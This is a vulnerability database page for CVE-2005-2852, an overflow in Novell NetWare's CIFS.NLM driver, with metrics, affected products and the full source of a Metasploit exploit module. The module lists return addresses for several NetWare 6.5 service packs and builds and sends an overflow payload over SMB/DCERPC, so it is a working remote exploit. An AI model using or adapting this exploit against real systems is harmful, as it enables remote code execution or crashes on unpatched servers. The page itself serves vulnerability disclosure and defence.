CVE-2005-2852 : Detail

CVE-2005-2852

2.6%V3
Network
2005-09-08
04h00 +00:00
2024-09-16
20h43 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Unknown vulnerability in CIFS.NLM in Novell Netware 6.5 SP2 and SP3, 5.1, and 6.0 allows remote attackers to cause a denial of service (ABEND) via an incorrect password length, as exploited by the "worm.rbot.ccc" worm.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 16832

Publication date : 2010-05-08 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: lsass_cifs.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the NetWare CIFS.NLM driver. Since the driver runs in the kernel space, a failed exploit attempt can cause the OS to reboot. }, 'Author' => [ 'toto', ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9262 $', 'References' => [ [ 'CVE', '2005-2852' ], [ 'OSVDB', '12790' ] ], 'Privileged' => true, 'Payload' => { 'Space' => 400, 'BadChars' => "\x00", }, 'Platform' => 'netware', 'Targets' => [ # NetWare SP can be found in the SNMP version : # 5.70.07 -> NetWare 6.5 (5.70) SP7 (07) [ 'VMware', { 'Ret' => 0x000f142b } ], [ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm) [ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm) [ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm) [ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm) [ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm) [ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm) ], 'DisclosureDate' => 'Jan 21 2007')) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (LSARPC)", 'lsarpc']) ], self.class) end def exploit # Force multi-bind off (netware doesn't support it) datastore['DCERPC::fake_bind_multi'] = false connect() smb_login() handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") stb = NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") + NDR.long(0) + NDR.long(0) + NDR.long(0) + NDR.long(0) + NDR.long(0) + NDR.long(0) + NDR.long(0x000f0fff) resp = dcerpc.call(0x2c, stb) handle, = resp[0,20] code, = resp[20, 4].unpack('V') name = rand_text_alphanumeric(0xa0) + [target.ret].pack('V') + payload.encoded stb = handle + NDR.long(1) + NDR.long(1) + NDR.short(name.length) + NDR.short(name.length) + NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingStringPreBuilt(name) + NDR.long(0) + NDR.long(0) + NDR.long(1) + NDR.long(0) print_status("Calling the vulnerable function ...") begin dcerpc.call(0x0E, stb) rescue end # Cleanup handler disconnect end end

Products Mentioned

Configuraton 0

Novell>>Netware >> Version 5.1

Novell>>Netware >> Version 6.0

Novell>>Netware >> Version 6.5

Novell>>Netware >> Version 6.5

References